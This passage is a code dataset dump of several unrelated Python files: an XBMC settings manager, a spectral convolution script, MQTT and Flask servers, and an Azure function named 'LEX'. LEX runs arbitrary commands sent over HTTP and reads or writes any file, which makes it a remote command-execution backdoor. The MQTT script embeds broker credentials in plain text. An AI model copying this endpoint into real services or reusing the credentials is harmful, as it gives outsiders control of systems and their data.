chunk\n split_char(str): Character to split lines on.\n add_linebreak(bool): Should a linebreak be re-added so that it is\n clear where a break was made?\n join_chars(str): Which character will be used to join lines at the\n point which they are merged into a chunk.\n \"\"\"\n\n out = []\n\n # Only continue if references are found\n\n if input_dict:\n\n sections = input_dict.get(\"sections\")\n\n # If there is something in sections: this will be a keyword for example\n # reference, or bibliography, etc\n\n if sections:\n\n # In case there are more than one keyword, cycle through them\n\n for _, refs in sections.items():\n\n # Refs will be a list, so cycle through it in case there was\n # more than one section found with the same keyword\n\n for ref in refs:\n\n if refs:\n\n refs_lines = self.split_lines(\n ref, split_char=split_char, add_linebreak=add_linebreak\n )\n refs_grouped = self.combine_n_rows(\n refs_lines, n=lines, join_char=join_char\n )\n\n _meta = {\n \"doc_hash\": input_dict.get(\"file_hash\"),\n \"provider\": input_dict.get(\"provider\"),\n }\n\n for i, lines in enumerate(refs_grouped):\n\n meta = 
copy.deepcopy(_meta)\n\n meta[\"line_number\"] = i\n\n tokens = nlp.tokenizer(lines)\n formatted_tokens = [\n self.format_token(i) for i in tokens\n ]\n\n out.append(\n {\n \"text\": lines,\n \"meta\": meta,\n \"tokens\": formatted_tokens,\n }\n )\n\n return out\n\n def format_token(self, token):\n \"\"\"\n Converts prodigy token to dict of format:\n\n {\"text\":\"of\",\"start\":32,\"end\":34,\"id\":5}\n \"\"\"\n out = dict()\n out[\"text\"] = token.text\n out[\"start\"] = token.idx\n out[\"end\"] = token.idx + len(token)\n out[\"id\"] = token.i\n\n return out\n\n def combine_n_rows(self, doc, n=5, join_char=\" \"):\n \"\"\"\n Splits a document into chunks of length `n` lines.\n\n Args:\n doc(str): A document as a string.\n n(int): The number of lines allowed in each chunk.\n join_char(str): The character used to join lines within a chunk.\n\n Returns:\n list: A list of chunks containing `n` lines.\n \"\"\"\n\n indices = list(range(len(doc)))\n\n # Split the document into blocks\n\n groups = list(zip(indices[0::n], indices[n::n]))\n\n # Iterate through each group of n rows, convert all the items\n # to str, and concatenate into a single string\n\n out = [join_char.join([str(j) for j in doc[beg:end]]) for beg, end in groups]\n\n # Check whether there is a remainder and concatenate if so\n\n max_index = len(groups) * n\n\n last_group = join_char.join([str(j) for j in doc[max_index : len(doc)]])\n\n out.append(last_group)\n\n return out\n\n def split_lines(self, doc, split_char=\"\\\\n\", add_linebreak=True):\n \"\"\"\n Split a document by `split_char`\n\n Args:\n doc(str): A document containing references\n split_char(str): Character by which `doc` will be split\n add_linebreak(bool): If `True`, re-adds the linebreak character to the\n end of each line that is split.\n\n Returns:\n (list): List of split lines (str).\n\n \"\"\"\n\n lines = doc.split(split_char)\n\n if add_linebreak:\n lines = [i + split_char for i in lines]\n\n return lines\n\n\n@plac.annotations(\n input_file=(\n \"Path to jsonl file containing produced by scraper and containing reference sections.\",\n \"positional\",\n None,\n str,\n ),\n output_file=(\n \"Path to jsonl file into which prodigy format references will be saved.\",\n \"positional\",\n None,\n str,\n ),\n lines=(\"How many lines to include in an annotation example.\", \"option\", \"l\", int),\n split_char=(\"Which character to split lines on.\", \"option\", \"s\", str),\n no_linebreak=(\n \"Don't re-add linebreaks to the annotation examples after splitting.\",\n \"flag\",\n \"n\",\n str,\n ),\n join_char=(\n \"Which character should be used to join lines into an annotation example.\",\n \"option\",\n \"j\",\n str,\n ),\n)\ndef reach_to_prodigy(\n input_file,\n output_file,\n lines=10,\n split_char=\"\\\\n\",\n no_linebreak=False,\n join_char=\" \",\n):\n\n print(split_char)\n\n scraped_json = read_jsonl(input_file)\n\n logger.info(\"Loaded %s scraped examples\", len(scraped_json))\n\n if no_linebreak:\n add_linebreak = False\n else:\n add_linebreak = True\n\n prodigy_format_references = ReachToProdigy(\n scraped_json,\n lines=lines,\n split_char=split_char,\n add_linebreak=add_linebreak,\n join_char=join_char,\n )\n\n references = prodigy_format_references.run()\n\n write_jsonl(references, output_file=output_file)\n\n logger.info(\"Prodigy format written to %s\", 
output_file)\n","sub_path":"deep_reference_parser/prodigy/reach_to_prodigy.py","file_name":"reach_to_prodigy.py","file_ext":"py","file_size_in_byte":9245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"18653490","text":"# ScriptName : settingsmgr.py\n# Version = '0.3'\n# Author : Van der Phunck aka Aslak Grinsted. as@phunck.cmo <- not cmo but com\n# Desc : settingsmanager for python\n#\n# \n# \n#\n\n\nimport xbmc, xbmcgui\nimport sys, traceback\nimport os.path\nfrom xml.dom.minidom import parse, parseString\n\nguiTitlePos=[10,6,80,15]\nguiMenuPos=[10,20,80,75]\n\nif xbmc.getSkinDir().lower().find('iii')>=0: #project mayhem iii\n\tguiMenuPos=[27,20,70,75]\n\n#-------------xml------------------\nNODE_ELEMENT=1\nNODE_ATTRIBUTE=2\nNODE_TEXT=3\nNODE_CDATA_SECTION=4\n\n\nACTION_MOVE_LEFT = 1 \nACTION_MOVE_RIGHT = 2\nACTION_MOVE_UP = 3\nACTION_MOVE_DOWN = 4\nACTION_PAGE_UP = 5 #left trigger\nACTION_PAGE_DOWN = 6 #right trigger\nACTION_SELECT_ITEM = 7 #A button\nACTION_HIGHLIGHT_ITEM = 8 \nACTION_PARENT_DIR = 9 #B button\nACTION_PREVIOUS_MENU = 10 #back button\nACTION_SHOW_INFO = 11\nACTION_PAUSE = 12\nACTION_STOP = 13\nACTION_NEXT_ITEM = 14\nACTION_PREV_ITEM = 15\nACTION_XBUTTON\t\t= 18 #Y Button\nACTION_WHITEBUTTON\t= 117 \n\nScriptPath = os.getcwd()\nif ScriptPath[-1]==';': ScriptPath=ScriptPath[0:-1]\nif ScriptPath[-1]!='\\\\': ScriptPath=ScriptPath+'\\\\'\n\n\ntry: Emulating = xbmcgui.Emulating #Thanks alot to alexpoet for the xbmc.py,xmbcgui.py emulator. Very useful!\nexcept: Emulating = False\n\n\ndef message(line1,line2='',line3=''):\n\tdialog = xbmcgui.Dialog()\n\tdialog.ok(\"Info\", line1,line2,line3)\n\ndef printLastError():\n\te=sys.exc_info()\n\ttraceback.print_exception(e[0],e[1],e[2])\n\ndef lastErrorString():\n\treturn sys.exc_info()[1]\n\n####################################################################################\n\ndef GetNodeText(node):\n\tdout=''\n\tfor tnode in node.childNodes:\n\t\tif (tnode.nodeType==NODE_TEXT)|(tnode.nodeType==NODE_CDATA_SECTION):\n\t\t\tdout=dout+tnode.nodeValue\n\treturn dout.encode(\"iso-8859-1\")\n\ndef GetNodeValue(node,tag=None): #helper function for xml reading\n\tif tag is None: return GetNodeText(node)\n\tnattr=node.attributes.getNamedItem(tag)\n\tif not (nattr is None): return nattr.value.encode(\"iso-8859-1\")\n\tfor child in node.childNodes:\n\t\tif child.nodeName==tag:\n\t\t\treturn GetNodeText(child)\n\treturn None\n \ndef GetChildNode(node,tag):\n\tfor child in node.childNodes:\n\t\tif child.nodeName==tag: return child\n\treturn None\n\ndef GetParamValue(pnode):\n\ttype=GetNodeValue(pnode,\"type\")\n\tif type=='string': return str(GetNodeValue(pnode,'value'))\n\tif type=='float': return float(GetNodeValue(pnode,'value'))\n\tif type=='int': return int(GetNodeValue(pnode,'value'))\n\tif type=='boolean': return bool(GetNodeValue(pnode,'value'))\n\tif type=='select': return int(GetNodeValue(pnode,'value'))\n\treturn \"unknown type:\"+str(GetNodeValue(pnode,'value'))\n\ndef SetParamValue(pnode,value):\n\ttype=GetNodeValue(pnode,'type')\n\tvaluenode=GetChildNode(pnode,'value')\n\tchildren=valuenode.childNodes\n\tfor child in children:\n\t\tvaluenode.removeChild(child)\n\tdoc=pnode.ownerDocument\n\tif type=='string':\n\t\tnewnode=doc.createCDATASection(str(value))\n\telse:\n\t\tnewnode=doc.createTextNode(str(value))\n\tvaluenode.appendChild(newnode)\n\ndef GetSelectOptions(pnode):\n\toptions=[]\n\tfor child in pnode.childNodes:\n\t\tif child.nodeName=='option': 
options.append(str(GetNodeText(child)))\n\treturn options\n\n####################################################################################\n\ndef OpenControlPanel(settingsfile):\n\tcp = ControlPanel()\n\tcp.setSettingsfile(settingsfile)\n\tcp.doModal()\n\tresult = cp.isConfirmed()\n\tdel cp\n\treturn result\n\ndef ReadSettings(settingsfile):\n\tdom = parse(settingsfile)\n\tparams=dom.getElementsByTagName(\"param\")\n\tsettings={}\n\tfor param in params:\n\t\tid=GetNodeValue(param,'id')\n\t\tsettings[id]=GetParamValue(param)\n\treturn settings\n\nclass ControlPanel(xbmcgui.Window):\n\tdef __init__(self):\n\t\tif Emulating: xbmcgui.Window.__init__(self) #for emulator to work\n\n\t\tw=self.getWidth()\n\t\th=self.getHeight()\n\t\tself.xratio=float(w/100.0)\n\t\tself.yratio=float(h/100.0)\n\n\t\tself.result = False\n\t\ttry:\n\t\t\tself.bg = xbmcgui.ControlImage(0,0,w,h, 'background.png')\n\t\t\tself.addControl(self.bg)\n\t\texcept:\n\t\t\tpass\n\t\t\n\n\t\tself.title = xbmcgui.ControlFadeLabel(int(self.xratio*guiTitlePos[0]),int(self.yratio*guiTitlePos[1]),int(self.xratio*guiTitlePos[2]),int(self.yratio*guiTitlePos[3]), 'font18','0xFFFFFFFF')\n\t\tself.addControl(self.title)\n\n\t\tself.list=xbmcgui.ControlList(int(self.xratio*guiMenuPos[0]),int(self.yratio*guiMenuPos[1]),int(self.xratio*guiMenuPos[2]),int(self.yratio*guiMenuPos[3]), 'font14','0xFFFFFFFF')\n\t\tself.addControl(self.list)\n\t\tself.listnodes=[]\n\n\tdef isConfirmed(self):\n\t\treturn self.result\n\t\n\tdef fillList(self,node):\n\t\tself.listnodes=[]\n\t\tself.title.reset()\n\t\tself.title.addLabel(str(GetNodeValue(node,\"name\")))\n\t\tself.list.reset()\n\t\tfor child in node.childNodes:\n\t\t\tname=None\n\t\t\tif child.nodeName=='param':\n\t\t\t\tname=GetNodeValue(child,\"name\")\n\t\t\t\ttype=GetNodeValue(child,\"type\")\n\t\t\t\tvalue=GetParamValue(child)\n\t\t\t\tif type==\"select\":\n\t\t\t\t\toptions=GetSelectOptions(child)\n\t\t\t\t\tvalue=options[value]\n\t\t\t\tname=name+': '+str(value)\n\t\t\tif child.nodeName=='settings':\n\t\t\t\tname='* '+GetNodeValue(child,\"name\")\n\t\t\tif name:\n\t\t\t\tself.list.addItem(name)\n\t\t\t\tself.listnodes.append(child)\n\t\tself.setFocus(self.list)\n\t\n\tdef saveSettings(self):\n\t\txmlstring=self.dom.toxml()\n\t\tf=file(self.settingsfile,'wb')\n\t\tresult = False\n\t\ttry:\n\t\t\tf.write(xmlstring)\n\t\t\tresult = True\n\t\tfinally:\n\t\t\tf.close()\n\t\treturn result\n\t\t\n\tdef setSettingsfile(self,settingsfile):\n\t\ttry:\n\t\t\tself.settingsfile = settingsfile\n\t\t\tself.dom = parse(self.settingsfile)\n\t\t\tself.node = self.dom.getElementsByTagName('settings').item(0)\n\t\t\tself.fillList(self.node)\n\t\t\t\n\t\texcept:\n\t\t\tself.close()\n\t\t\traise\n\n\n\t\t\n\tdef onAction(self, action):\n\t\tif action == ACTION_PREVIOUS_MENU:\n\t\t\tdialog = xbmcgui.Dialog()\n\t\t\tif dialog.yesno(\"Settings\", \"Do you want to save your settings?\"):\n\t\t\t\tself.result = self.saveSettings()\n\t\t\tself.close()\n\t\t\treturn\n\t\ttry:\n\t\t\tnewvalue = None\n\t\t\tselectedNode = self.listnodes[self.list.getSelectedPosition()]\n\t\t\tlistitem=self.list.getSelectedItem()\n\t\t\tif action == ACTION_PARENT_DIR:\n\t\t\t\tparentNode=selectedNode.parentNode\n\t\t\t\tif parentNode.nodeName=='settings':\n\t\t\t\t\tself.fillList(parentNode)\n\t\t\t\t\treturn\n\t\t\tif (selectedNode.nodeName=='settings') and (action == ACTION_SELECT_ITEM):\n\t\t\t\tself.fillList(selectedNode)\n\t\t\t\treturn\n\t\t\t\t\n\t\t\tif 
selectedNode.nodeName=='param':\n\t\t\t\ttype=GetNodeValue(selectedNode,'type')\n\t\t\t\tname=GetNodeValue(selectedNode,'name')\n\t\t\t\tvalue=GetParamValue(selectedNode)\n\t\t\t\tif (type=='string') or (type=='float') or (type=='int'):\n\t\t\t\t\tif action == ACTION_SELECT_ITEM:\n\t\t\t\t\t\tkeyboard=xbmc.Keyboard(str(value))\n\t\t\t\t\t\tkeyboard.doModal()\n\t\t\t\t\t\tnewvalue=keyboard.getText()\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tif type=='float': newvalue=float(newvalue)\n\t\t\t\t\t\t\tif type=='int': newvalue=int(newvalue)\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tnewvalue=None\n\t\t\t\tif (type=='boolean'):\n\t\t\t\t\tif (action==ACTION_SELECT_ITEM):\n\t\t\t\t\t\tnewvalue=(not value)\n\t\t\t\tnewvaluestring=str(newvalue)\n\t\t\t\tif (type=='select'):\n\t\t\t\t\toptions=GetSelectOptions(selectedNode)\n\t\t\t\t\tif (action == ACTION_MOVE_LEFT) or (action == ACTION_SELECT_ITEM): newvalue=value+1\n\t\t\t\t\tif (action == ACTION_MOVE_RIGHT): newvalue=value-1\n\t\t\t\t\tif newvalue:\n\t\t\t\t\t\tnewvalue=newvalue % len(options)\n\t\t\t\t\t\tnewvaluestring=str(options[newvalue])\n\t\t\t\tif not (newvalue is None):\n\t\t\t\t\tSetParamValue(selectedNode,newvalue)\n\t\t\t\t\tlistitem.setLabel(name+': '+newvaluestring)\n\t\texcept: \n\t\t\ttry:\n\t\t\t\tself.close()\n\t\t\t\tprint('Error!') \n\t\t\t\tprintLastError()\n\t\t\texcept: \n\t\t\t\tpass\n\n\tdef onControl(self,control):\n\t\tpass\n","sub_path":"Flickr/include/settingsmgr.py","file_name":"settingsmgr.py","file_ext":"py","file_size_in_byte":7527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"340755852","text":"#!/usr/bin/env python\nimport os\nimport sys\nfrom typing import Optional\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib import rc\nfrom numpy import ndarray\n\nimport eniric\nimport eniric.io_module as io\nfrom eniric.broaden import convolution\nfrom eniric.obsolete.utilities import read_spectrum\n\n# set stuff for latex usage\nrc(\"text\", usetex=True)\n\ndata_rep = eniric.paths[\"phoenix_dat\"]\nresults_dir = eniric.paths[\"results\"]\nresampled_dir = eniric.paths[\"resampled\"]\n\n# models form PHOENIX-ACES\nM0_ACES = data_rep + \"lte03900-4.50-0.0.PHOENIX-ACES-AGSS-COND-2011-HiRes_wave.dat\"\nM3_ACES = data_rep + \"lte03500-4.50-0.0.PHOENIX-ACES-AGSS-COND-2011-HiRes_wave.dat\"\nM6_ACES = data_rep + \"lte02800-4.50-0.0.PHOENIX-ACES-AGSS-COND-2011-HiRes_wave.dat\"\nM9_ACES = data_rep + \"lte02600-4.50-0.0.PHOENIX-ACES-AGSS-COND-2011-HiRes_wave.dat\"\n\n\ndef run_convolutions(spectrum_string: str, band: str) -> None:\n \"\"\"\n Runs the convolutions for a set of spectra in batch\n \"\"\"\n vsini = [1.0, 5.0, 10.0]\n R = [60000, 80000, 100000]\n\n spectrum = spectrum_string # removed exec usage\n print(spectrum)\n print(\n \"Running the convolutions for spectra of {0:s} in band {1:s}\\n.\".format(\n spectrum, band\n )\n )\n for vel in vsini:\n for res in R:\n convolve_spectra(spectrum, band, vel, res)\n\n\ndef save_convolution_results(\n filename: str, wavelength: ndarray, flux: ndarray, convolved_flux: ndarray\n) -> int:\n \"\"\"Saves convolution results to a file.\n\n Parameters\n ----------\n filename: str\n wavelength: array-like\n flux, convolved_flux\n \"\"\"\n print(\"Saving results...\")\n\n # Note: difference in sampling at 1.0 and 1.5 microns makes jumps\n # in the beginning of Y and H bands\n eniric.obsolete.IOmodule.write_e_3col(filename, wavelength, flux, convolved_flux)\n print(\"Done.\")\n return 0\n\n\ndef convolve_spectra(\n spectrum,\n 
band,\n vsini,\n R,\n epsilon: float = 0.6,\n fwhm_lim: float = 5.0,\n num_procs: Optional[int] = None,\n results_dir: str = results_dir,\n normalize: bool = True,\n output_name: Optional[str] = None,\n) -> int:\n \"\"\"Load Spectrum, apply convolution and then save results.\"\"\"\n print(\"Reading the data...\")\n wav, flux = read_spectrum(spectrum) # In microns and photon flux.\n print(\"Done.\")\n\n wav_band, flux_band, convolved_flux = convolution(\n wav,\n flux,\n vsini,\n R,\n band,\n epsilon=epsilon,\n fwhm_lim=fwhm_lim,\n num_procs=num_procs,\n normalize=normalize,\n )\n if not normalize:\n norm_ = \"_unnormalized\"\n else:\n norm_ = \"\"\n\n if output_name is None:\n name_model = name_assignment(spectrum)\n\n filename = \"{0}Spectrum_{1}_{2}band_vsini{3:3.1f}_R{4:d}k{5}.dat\".format(\n results_dir, name_model, band, vsini, R / 1000, norm_\n )\n else:\n filename = os.path.join(results_dir, output_name)\n\n save_convolution_results(filename, wav_band, flux_band, convolved_flux)\n\n return 0\n\n\n###############################################################################\ndef name_assignment(spectrum: str):\n \"\"\"\n assigns a name to the filename in which the spectrum is going to be saved\n \"\"\"\n # Simplified to temperature and base in spectrum name.\n m0_aces = \"lte03900\"\n m3_aces = \"lte03500\"\n m6_aces = \"lte02800\"\n m9_aces = \"lte02600\"\n base = \"PHOENIX-ACES-AGSS-COND-2011-HiRes_wave.dat\"\n if (m0_aces in spectrum) and (base in spectrum):\n name = \"M0-PHOENIX-ACES\"\n elif (m3_aces in spectrum) and (base in spectrum):\n name = \"M3-PHOENIX-ACES\"\n elif (m6_aces in spectrum) and (base in spectrum):\n name = \"M6-PHOENIX-ACES\"\n elif (m9_aces in spectrum) and (base in spectrum):\n name = \"M9-PHOENIX-ACES\"\n else:\n raise ValueError(\"Name {0} not found!\".format(spectrum))\n return name\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 3:\n run_convolutions(sys.argv[1], sys.argv[2])\n else:\n print(\"Arguments not compatible with called function.\")\n","sub_path":"eniric/obsolete/nIRanalysis.py","file_name":"nIRanalysis.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"181512063","text":"import logging\n\nimport azure.functions as func\n\nimport subprocess\nimport json\nimport os\nimport base64\nfrom traceback import format_tb\n\nfrom .general_utils import *\n\nREAD_BINARY = \"rb\"\nWRITE = \"w\"\n\n# if true, LEX will return traceback info when encountering unexpected exceptions\nINCLUDE_TRACEBACK_IN_RESPONSE = False\nif \"LEX_TRACE\" in os.environ:\n if os.environ[\"LEX_TRACE\"] == \"True\":\n INCLUDE_TRACEBACK_IN_RESPONSE = True\n\n\"\"\"\n* Handler\n\"\"\"\ndef handler(req: func.HttpRequest) -> func.HttpResponse:\n logging.info(\"[+] LEX: Starting...\")\n\n req = req.get_body().decode('utf8')\n try:\n req = json.loads(req)\n except json.decoder.JSONDecodeError as e:\n return construct_exception_response(e)\n\n try:\n action, data = parse_action(req)\n\n # Bash commands\n if action == CMD_ACTION:\n return_code, out = run_cmd(data)\n return construct_cmd_response(return_code, out)\n\n # Get file \n elif action == GETFILE_ACTION:\n if \"file\" not in data or \"mode\" not in data:\n return construct_response(LEXResult.ERR, \"[!] 
Get file request should contain file and mode\")\n result, out = run_getfile(data[\"file\"], data[\"mode\"])\n return construct_getfile_response(result, out)\n\n # Put file\n elif action == PUTFILE_ACTION:\n if \"path\" not in data or \"content\" not in data or \"mode\" not in data:\n return construct_response(LEXResult.ERR, \"[!] Put file request should contain path, content and mode\")\n result, out = run_putfile(data[\"path\"], data[\"content\"], data[\"mode\"])\n return construct_putfile_response(result, out)\n\n\n except Exception as e:\n return construct_exception_response(e)\n\n\ndef parse_action(event):\n \"\"\"\n * Returns action, data from event\n \"\"\"\n simple_response = False\n if \"body\" in event:\n body = json.loads(event[\"body\"])\n else:\n body = event\n\n if ACTION in body:\n if body[ACTION] == CMD_ACTION:\n if CMD_ACTION in body:\n return CMD_ACTION, body[CMD_ACTION]\n else:\n raise Exception(\"[!] parse_action: cmd request does not include a command\")\n\n elif body[ACTION] == GETFILE_ACTION:\n if GETFILE_ACTION in body:\n return GETFILE_ACTION, body[GETFILE_ACTION]\n else:\n raise Exception(\"[!] parse_action: getfile request does not include data\")\n elif body[ACTION] == PUTFILE_ACTION:\n if PUTFILE_ACTION in body:\n return PUTFILE_ACTION, body[PUTFILE_ACTION]\n else:\n raise Exception(\"[!] parse_action: putfile request does not include data\")\n else:\n raise Exception(\"[!] parse_action: Unknown action: {}\".format(body[\"action\"]))\n\n else:\n raise Exception(\"[!] parse_action: Request does not include an action\")\n\n\ndef run_cmd(cmd):\n \"\"\"\n * Runs a command as an external process\n \"\"\"\n os.environ['PYTHONUNBUFFERED'] = \"1\" # Required for streaming both stdout and stderr to stdout\n child = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n out, _ = child.communicate()\n rc = child.returncode\n return rc, out\n\n\n# returns LEXResult, output\ndef run_getfile(file, mode):\n # Check that file exists\n if not os.path.exists(file):\n return LEXResult.ERR, \"run_getfile: file '{}' doesn't exist on Lambda\".format(file)\n\n try:\n content = readfile(file, mode)\n\n # Base64 encode\n if type(content) is str:\n content = bytes(content.encode(\"utf8\")) # b64encode only excepts bytes.\n encoded = base64.b64encode(content)\n\n if len(encoded) < MAX_BODY_SIZE:\n return LEXResult.OK, encoded\n\n # file too big, let's try to compress it\n content_len = len(content)\n encoded_len = len(encoded)\n del content, encoded # delete large vars\n\n # Create tar file\n tar_path = \"/tmp/\" + os.path.basename(file) + \".tar\"\n create_tar_file(file, tar_path)\n\n # Read tar file and then delete it\n tar_content = readfile(tar_path, READ_BINARY)\n os.unlink(tar_path)\n\n # Send tar content if not too big\n tar_encoded = base64.b64encode(tar_content)\n if len(tar_encoded) < MAX_BODY_SIZE:\n return LEXResult.OK_TAR, tar_encoded\n\n except UnicodeDecodeError:\n err_str = \"run_getfile: reading file failed with UnicodeDecodeError, consider reading in binary mode (!gtb)\"\n return LEXResult.ERR, err_str\n except IOError as e:\n return LEXResult.ERR, repr(e)\n\n # File too big....\n err_str = \"[!] File to big! 
size {}, encoded size {}, tar size {}, encoded tar size {}\".format( \\\n content_len, encoded_len, len(tar_content), len(tar_encoded))\n return LEXResult.ERR, err_str\n\n\n# returns LEXResult, output\ndef run_putfile(path, content, writemode):\n decoded = base64.b64decode(str(content))\n\n # If not binary write, convert decoded into a string\n if writemode == WRITE:\n decoded = decoded.decode(\"utf8\")\n\n try:\n # Write the received file\n writefile(path, writemode, decoded)\n except IOError as e:\n return LEXResult.ERR, \"Failed to write to {} with: {}\".format(path, repr(e))\n\n return LEXResult.OK, None\n\n\ndef construct_cmd_response(return_code, output):\n if return_code == 0:\n result = LEXResult.OK\n else:\n result = LEXResult.ERR\n\n output_b64 = base64.b64encode(output).decode(\"ascii\")\n return construct_response(result, output_b64) \n\n\ndef construct_getfile_response(result, output):\n if result != LEXResult.ERR:\n # if an err didn't occur, the output is base64 bytes. Let's convert into base64 string\n output = output.decode(\"ascii\")\n\n return construct_response(result, output)\n\n\ndef construct_putfile_response(result, output):\n return construct_response(result, output)\n\n\ndef construct_exception_response(exception):\n if INCLUDE_TRACEBACK_IN_RESPONSE:\n # Prefix exception with traceback info\n display_exception = \"LEX Traceback:\\n\"\n for trace in format_tb(exception.__traceback__):\n display_exception += trace\n\n else:\n display_exception = \"(set Lambda's env var 'LEX_TRACE' as 'True' for traceback info)\\n\"\n\n display_exception += str(repr(exception))\n\n return construct_response(LEXResult.LEX_EXCEPTION, display_exception)\n\n\ndef construct_response(result, output):\n response = json.dumps({\"result\": result.value, \"output\": output})\n return func.HttpResponse(response)\n","sub_path":"deploy/azure/python3/lex_func/lex.py","file_name":"lex.py","file_ext":"py","file_size_in_byte":6653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"483548135","text":"from enum import Enum\n\nEventType = Enum(\"EventType\", \"BAR ORDER FILL SIGNAL\")\n\n\nclass Event:\n pass\n\n\nclass Bar(Event):\n def __init__(\n self,\n ticker,\n time,\n period,\n open_price,\n high_price,\n low_price,\n close_price,\n volume,\n adj_close=None,\n ):\n self.type = EventType.BAR\n self.ticker = ticker\n self.time = time\n self.period = period\n self.open_price = open_price\n self.close_price = close_price\n self.high_price = high_price\n self.low_price = low_price\n self.volume = volume\n self.adj_close = adj_close\n\n def __str__(self):\n return f\"\"\n\n\nclass Order(Event):\n def __init__(self, ticker, target_weight=None, quantity=None):\n self.type = EventType.ORDER\n self.ticker = ticker\n self.target_weight = target_weight\n self.quantity = quantity\n\n\nclass Fill(Event):\n def __init__(self, timestamp, ticker, quantity, fill_price, commission):\n self.type = EventType.FILL\n self.timestamp = timestamp\n self.ticker = ticker\n self.quantity = quantity\n self.fill_price = fill_price\n self.commission = commission\n","sub_path":"backtester/backtester/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"262732449","text":"import paho.mqtt.client as mqtt\nimport os\nfrom urllib.parse import urlparse\nimport secrets\nimport django\ndjango.setup()\nfrom django.contrib.auth.models import User\nfrom 
aifarmer.models import Sensor, SensorsUsers, Temperature, Humidity\n\n\n\nstop_dev=False\ndef on_connect(client, userdata, flags, rc):\n print(\"rc: \" + str(rc))\n\ndef on_message(client, obj, msg):\n print(msg.topic + \" \" + str(msg.qos) + \" \" + str(msg.payload))\n\n mess = msg.payload.decode()\n top = msg.topic\n if len(top)>63:\n tok_loc=top[0:top.index('/')]\n if top.endswith('T'):\n sens = Sensor.objects.get(token_sensor=tok_loc.strip())\n t = Temperature(sensor_temperature=sens, temperature_read=float(mess))\n t.save()\n elif top.endswith('H'):\n sens = Sensor.objects.get(token_sensor=tok_loc.strip())\n h = Humidity(sensor_humidity=sens, humidity_read=float(mess))\n h.save()\n\n\ndef on_publish(client, obj, mid):\n #print(\"mid: \" + str(mid))\n pass\n\ndef existence_callback(client,obj,message):\n mess = message.payload.decode()\n dev_name = mess[0:mess.index('/')]\n print('device-name:'+ dev_name)\n dev_pin = mess[mess.index('/')+1: len(mess)]\n print('device-pin:' + dev_pin)\n\n if Sensor.objects.filter(name_sensor=dev_name).count() == 0:\n client.subscribe(dev_name+'/REG',0) # to be split into dev-name and pin\n client.message_callback_add(dev_name+'/REG',registration_callback)\n tok = secrets.token_hex(32)\n sensor = Sensor(name_sensor=dev_name,pin_sensor=dev_pin,token_sensor=tok,latitude_sensor=45,longitude_sensor=45)\n sensor.save()\n\n\n # send dev_name, dev_pin, GENERATE token and write DB.\n # <==> it doesn't already exist!!!\n\n\ndef registration_callback(client,obj,message):\n mess = message.payload.decode()\n top = str(message.topic)\n if mess == '?':\n dev_name = top[0:top.index('/')]\n print(dev_name)\n Sens = Sensor.objects.filter(name_sensor=dev_name)\n # iterate over the queryset: token_sensor lives on each Sensor row,\n # not on the queryset itself\n for sen in Sens:\n tok_loc = str(sen.token_sensor)\n client.publish(str(message.topic), tok_loc)\n client.subscribe(tok_loc+'/T')\n client.subscribe(tok_loc+'/H')\n\n\n\ndef on_subscribe(client, obj, mid, granted_qos):\n print(\"Subscribed: \" + str(mid) + \" \" + str(granted_qos))\n\ndef on_log(client, obj, level, string):\n print(string)\n\n\nmqttc = mqtt.Client()\n# Assign event callbacks\nmqttc.on_message = on_message\nmqttc.on_connect = on_connect\nmqttc.on_publish = on_publish\nmqttc.on_subscribe = on_subscribe\n\n# Uncomment to enable debug messages\n#mqttc.on_log = on_log\n\n# Parse CLOUDMQTT_URL (or fallback to localhost)\n#url_str = 'mqtt://try:try@broker.shiftr.io:1883'\nurl_str = 'mqtt://astroteo:Gold4Himself@mqtt.aifarmer.du.cdr.mn:8883'\nurl = urlparse(url_str)\nprint(url.hostname)\nprint(url.username)\nprint(url.password)\nprint(url.port)\n\n\nsub_topics= [('NEW-DEV',0)]\n#pub_topics = ['DEV-42/ACT','DEV-43/ACT']\n#pub_contents = ['0','1']\n\n\n# Connect\nmqttc.username_pw_set(url.username, url.password)\nmqttc.connect(url.hostname, url.port)\n\n# Start subscribe, with QoS level 0\nmqttc.subscribe(sub_topics)\nmqttc.message_callback_add('NEW-DEV',existence_callback)\n# Continue the network loop, exit when an error occurs\nrc = 0\ncount=0\nwhile rc == 0:\n rc = mqttc.loop()\n","sub_path":"PythonForCheck/sim_srv.py","file_name":"sim_srv.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"52827","text":"# coding:utf-8\n\nfrom flask import Flask, render_template, request, redirect, url_for\nfrom werkzeug.utils import secure_filename\nimport os\nfrom flask_socketio import SocketIO, emit\nprint(os.system('ifconfig | grep -w inet'))\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 
'secret!'\nsocketio = SocketIO(app)\n\n\n@app.route('/IM', methods=['POST', 'GET'])\ndef IM():\n return render_template('publicIM.html')\n\n\n@app.route('/upload', methods=['POST', 'GET'])\ndef upload():\n if request.method == 'POST':\n print(request.files)\n f = request.files['file']\n print(f)\n # directory containing the current .py file\n basepath = os.path.dirname(__file__)\n uploadpath = os.path.join(basepath, 'static/uploadfile', secure_filename(f.filename))\n f.save(uploadpath)\n return render_template('upload.html')\n\n\n@socketio.on('imessage', namespace='/test_conn')\ndef message_info(message):\n print(message)\n emit('message', {'data': message['data']}, broadcast=True)\n\n\n@app.route('/')\ndef index():\n return redirect(url_for('IM'))\n\n\nif __name__ == '__main__':\n # socketio.run wraps app.run; calling app.run first would block here and\n # the SocketIO server would never start\n socketio.run(app=app, host=\"0.0.0.0\", port=5000, 